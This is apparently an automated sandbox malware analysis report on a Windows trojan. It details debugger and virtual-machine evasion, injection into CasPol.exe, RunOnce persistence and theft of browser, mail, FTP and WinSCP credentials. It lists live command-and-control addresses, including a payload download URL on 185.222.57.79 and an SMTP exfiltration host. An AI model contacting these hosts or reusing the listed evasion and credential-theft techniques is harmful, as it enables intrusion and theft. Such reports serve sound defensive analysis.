            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14986495060.0000000004F59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14986495060.0000000004F59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
            Source: CasPol.exe, 00000005.00000002.19736589261.000000000164E000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: vmNETFX.ThreadPod
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14986495060.0000000004F59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14986495060.0000000004F59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat

            Anti Debugging

            barindex
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeThread information set: HideFromDebugger
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_70E21BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_0339213A rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_03398515 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_03398B6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_03398B95 mov ebx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_03398B95 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_03398D84 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_03398BD4 mov ebx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_03398A3A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_03398A08 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_0339DAB2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_0339F0EF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_0339E0D5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_0339BB26 LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 1100000
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000005.00000002.19759760809.000000001D7ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.19758765647.000000001D731000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 4392, type: MEMORYSTR
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: Yara matchFile source: 00000005.00000002.19758765647.000000001D731000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 4392, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000005.00000002.19759760809.000000001D7ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.19758765647.000000001D731000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 4392, type: MEMORYSTR
            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts211
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            2
            OS Credential Dumping
            3
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            Exfiltration Over Other Network Medium1
            Ingress Tool Transfer
            Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
            System Shutdown/Reboot
            Default Accounts1
            Native API
            1
            Registry Run Keys / Startup Folder
            1
            Access Token Manipulation
            1
            Deobfuscate/Decode Files or Information
            1
            Credentials in Registry
            117
            System Information Discovery
            Remote Desktop Protocol2
            Data from Local System
            Exfiltration Over Bluetooth1
            Encrypted Channel
            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)111
            Process Injection
            2
            Obfuscated Files or Information
            Security Account Manager431
            Security Software Discovery
            SMB/Windows Admin Shares1
            Email Collection
            Automated Exfiltration1
            Non-Standard Port
            Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)1
            Registry Run Keys / Startup Folder
            1
            DLL Side-Loading
            NTDS1
            Process Discovery
            Distributed Component Object Model1
            Clipboard Data
            Scheduled Transfer2
            Non-Application Layer Protocol
            SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script361
            Virtualization/Sandbox Evasion
            LSA Secrets361
            Virtualization/Sandbox Evasion
            SSHKeyloggingData Transfer Size Limits122
            Application Layer Protocol
            Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common1
            Access Token Manipulation
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items111
            Process Injection
            DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 635338 Sample: SecuriteInfo.com.Trojan.Inj... Startdate: 27/05/2022 Architecture: WINDOWS Score: 100 26 mail.parkhotelizmir.com 2->26 32 Snort IDS alert for network traffic 2->32 34 Found malware configuration 2->34 36 Malicious sample detected (through community Yara rule) 2->36 38 5 other signatures 2->38 8 SecuriteInfo.com.Trojan.Inject.11626.exe 3 28 2->8         started        signatures3 process4 file5 22 C:\Users\user\AppData\Local\...\System.dll, PE32 8->22 dropped 24 C:\Users\user\AppData\...\ThrottlePlugin.dll, PE32+ 8->24 dropped 40 Writes to foreign memory regions 8->40 42 Tries to detect Any.run 8->42 44 Hides threads from debuggers 8->44 12 CasPol.exe 1 13 8->12         started        16 CasPol.exe 8->16         started        18 CasPol.exe 8->18         started        signatures6 process7 dnsIp8 28 185.222.57.79, 49754, 80 ROOTLAYERNETNL Netherlands 12->28 30 mail.parkhotelizmir.com 45.10.148.33, 49763, 587 EKSENBILISIMTR Turkey 12->30 46 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 12->46 48 Tries to steal Mail credentials (via file / registry access) 12->48 50 Tries to harvest and steal ftp login credentials 12->50 56 3 other signatures 12->56 20 conhost.exe 12->20         started        52 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 16->52 54 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 16->54 signatures9 process10

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            SecuriteInfo.com.Trojan.Inject.11626.exe12%VirustotalBrowse
            SecuriteInfo.com.Trojan.Inject.11626.exe5%ReversingLabs
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\ThrottlePlugin.dll0%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\ThrottlePlugin.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\nsg40B0.tmp\System.dll3%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\nsg40B0.tmp\System.dll0%ReversingLabs
            No Antivirus matches
            SourceDetectionScannerLabelLink
            mail.parkhotelizmir.com0%VirustotalBrowse
            SourceDetectionScannerLabelLink
            http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
            http://DynDns.comDynDNS0%Avira URL Cloudsafe
            http://185.222.57.79/SALES/muhasebe0%Avira URL Cloudsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%Avira URL Cloudsafe
            https://api.ipify.org%40%Avira URL Cloudsafe
            http://2HBIa742d4finT.com0%Avira URL Cloudsafe
            http://mail.parkhotelizmir.com0%Avira URL Cloudsafe
            https://api.ipify.org%GETMozilla/5.00%Avira URL Cloudsafe
            http://yogqTE.com0%Avira URL Cloudsafe
            http://185.222.57.79/SALES/muhasebe@par%20v4_zZlYyWbWEF39.bin0%Avira URL Cloudsafe
            http://185.222.57.79/SALES/muhasebe@par%20v4_zZlYyWbWEF39.bin10%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            mail.parkhotelizmir.com
            45.10.148.33
            truetrueunknown
            NameMaliciousAntivirus DetectionReputation
            http://185.222.57.79/SALES/muhasebe@par%20v4_zZlYyWbWEF39.bintrue
            • Avira URL Cloud: safe
            unknown
            http://185.222.57.79/SALES/muhasebe@par%20v4_zZlYyWbWEF39.bin1true
            • Avira URL Cloud: safe
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://creativecommons.org/ns#DerivativeWorksSecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.drfalse
              high
              http://127.0.0.1:HTTP/1.1CasPol.exe, 00000005.00000002.19758765647.000000001D731000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              low
              http://DynDns.comDynDNSCasPol.exe, 00000005.00000002.19758765647.000000001D731000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://creativecommons.org/licenses/by-sa/4.0/user-not-tracked-symbolic.svg.1.drfalse
                high
                http://creativecommons.org/ns#DistributionSecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.drfalse
                  high
                  http://185.222.57.79/SALES/muhasebeCasPol.exe, 00000005.00000002.19734742085.000000000133A000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  unknown
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haCasPol.exe, 00000005.00000002.19758765647.000000001D731000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://creativecommons.org/ns#AttributionSecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.drfalse
                    high
                    https://api.ipify.org%4CasPol.exe, 00000005.00000002.19758765647.000000001D731000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    low
                    http://2HBIa742d4finT.comCasPol.exe, 00000005.00000002.19759961032.000000001D813000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.19758765647.000000001D731000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://creativecommons.org/ns#ShareAlikeSecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.drfalse
                      high
                      http://mail.parkhotelizmir.comCasPol.exe, 00000005.00000002.19760423479.000000001D872000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://api.ipify.org%GETMozilla/5.0CasPol.exe, 00000005.00000002.19758765647.000000001D731000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      low
                      http://nsis.sf.net/NSIS_ErrorErrorSecuriteInfo.com.Trojan.Inject.11626.exe, FRATERNATE.exe.5.drfalse
                        high
                        http://creativecommons.org/ns#NoticeSecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.drfalse
                          high
                          http://creativecommons.org/ns#ReproductionSecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.drfalse
                            high
                            http://yogqTE.comCasPol.exe, 00000005.00000002.19758765647.000000001D731000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://creativecommons.org/ns#SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.drfalse
                              high
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              185.222.57.79
                              unknownNetherlands
                              51447ROOTLAYERNETNLtrue
                              45.10.148.33
                              mail.parkhotelizmir.comTurkey
                              208485EKSENBILISIMTRtrue
                              Joe Sandbox Version:34.0.0 Boulder Opal
                              Analysis ID:635338
                              Start date and time: 27/05/202219:38:482022-05-27 19:38:48 +02:00
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 13m 32s
                              Hypervisor based Inspection enabled:false
                              Report type:light
                              Sample file name:SecuriteInfo.com.Trojan.Inject.11626.exe
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                              Run name:Suspected Instruction Hammering
                              Number of analysed new started processes analysed:21
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@8/13@1/2
                              EGA Information:
                              • Successful, ratio: 100%
                              HDC Information:
                              • Successful, ratio: 26.2% (good quality ratio 25.6%)
                              • Quality average: 89%
                              • Quality standard deviation: 20.8%
                              HCA Information:
                              • Successful, ratio: 99%
                              • Number of executed functions: 0
                              • Number of non-executed functions: 0
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Adjust boot time
                              • Enable AMSI
                              • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, HxTsr.exe, RuntimeBroker.exe, backgroundTaskHost.exe, svchost.exe
                              • TCP Packets have been reduced to 100
                              • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, wdcpalt.microsoft.com, client.wns.windows.com, ctldl.windowsupdate.com, wdcp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                              TimeTypeDescription
                              19:41:05AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\FRATERNATE.exe
                              19:41:13AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\FRATERNATE.exe
                              19:41:16API Interceptor2748x Sleep call for process: CasPol.exe modified
                              No context
                              No context
                              No context
                              No context
                              No context
                              Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:modified
                              Size (bytes):43
                              Entropy (8bit):4.693479289485192
                              Encrypted:false
                              SSDEEP:3:JODb6MHIymy32ov:Jebozyn
                              MD5:8B36E2227A5BD0472C64194B43581D90
                              SHA1:E391FCABCE78C902A95B2B3A90F46380AA0E6031
                              SHA-256:7A5D1B27408729909236B8B98CD3D19002750B7297981F32A6E6DD743B16BFB4
                              SHA-512:FE426325981C65C37C16AE8021B2D8EDB50009743DC54C3EA2F496CA020BB980BCC43D70F5A2498A2AB8315183F5D2437DB72CCE69698978D927FA0E25DB1375
                              Malicious:false
                              Reputation:low
                              Preview:[Vddelber60]..Paxilla=EKSKOMMUNIKATIONERS..
                              Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe
                              File Type:HTML document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1245
                              Entropy (8bit):5.462849750105637
                              Encrypted:false
                              SSDEEP:24:hM0mIAvy4Wvsqs1Ra7JZRGNeHX+AYcvP2wk1RjdEF3qpMk5:lmIAq1UqsziJZ+eHX+AdP2TvpMk5
                              MD5:5343C1A8B203C162A3BF3870D9F50FD4
                              SHA1:04B5B886C20D88B57EEA6D8FF882624A4AC1E51D
                              SHA-256:DC1D54DAB6EC8C00F70137927504E4F222C8395F10760B6BEECFCFA94E08249F
                              SHA-512:E0F50ACB6061744E825A4051765CEBF23E8C489B55B190739409D8A79BB08DAC8F919247A4E5F65A015EA9C57D326BBEF7EA045163915129E01F316C4958D949
                              Malicious:false
                              Reputation:moderate, very likely benign file
                              Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>404 - File or directory not found.</title>..<style type="text/css">.. ..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="co
                              Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):40
                              Entropy (8bit):4.412814895472355
                              Encrypted:false
                              SSDEEP:3:bAL2Wlv3AhWuvU2:bu2gYEd2
                              MD5:176F3A8631F14F0421935D07502B8CD9
                              SHA1:70C91B54BDE9BA107AB322ECACF16C60E0D8E57B
                              SHA-256:F507F6BB14F286DD6835A18FC9ECDB86F73DBA96E9E281D626718447F1C496BB
                              SHA-512:CC963E6BD3577D12FAC185D3D61CCC72098C52E5F2E907E5724BA7BC9FF022A2E74D0DF18D82AD7EC645FEE9328458B7493B1BDD7F1216A677A42F8516568336
                              Malicious:false
                              Reputation:low
                              Preview:[Godgrendes]..Resipiscence=Mightily197..
                              Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):380640
                              Entropy (8bit):6.00755593352656
                              Encrypted:false
                              SSDEEP:6144:tqpZKqQPNb5tPcACMBdK99Uf2o7nypI83l4tHY1706ePrz2lxf:tqEvcA49Ro7R64Pi
                              MD5:07B4E869E84B557512EE38A5C283FEF3
                              SHA1:85AFD748ACB7DB97C763ABFEA292E8543B084517
                              SHA-256:C718B6BF9A427A117FFC1AB1C0E02551AFB2675406BAC625534E02179DB12C9D
                              SHA-512:C1E7E9781B538D6FD1265DF135606483DCC80B190FFB6DE6C9A7C4DD83B2B4453C746FE7C4E4AE577BE5DD40D4BB98BE8D0325119148D81D8D3CD094E92606E7
                              Malicious:false
                              Antivirus:
                              • Antivirus: Metadefender, Detection: 0%, Browse
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.........EK..+...+...+......+...*...+.......+.../...+...(...+.$.*...+...,...+...-...+...*...+...*...+.$.....+.$.+...+.$.....+.......+.$.)...+.Rich..+.........................PE..d...W6;a.........." .........2......$y....................................... .......P....`.........................................pK..T....K..0.......p........!......................T......................(......................h............................text...<........................... ..`.rdata.. ...........................@..@.data....%...........~..............@....pdata...!......."..................@..@.rsrc...p...........................@..@.reloc..............................@..B........................................................................................................................................................................................................
                              Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):133983
                              Entropy (8bit):4.053356129693858
                              Encrypted:false
                              SSDEEP:1536:0aDhpwRpeoT7/pL9vWX8iQC21Jl4YULhmlxv:0aTWeoT7/YUyVhmxv
                              MD5:B364DBDF5A8A0C58CD4B721BE9432C48
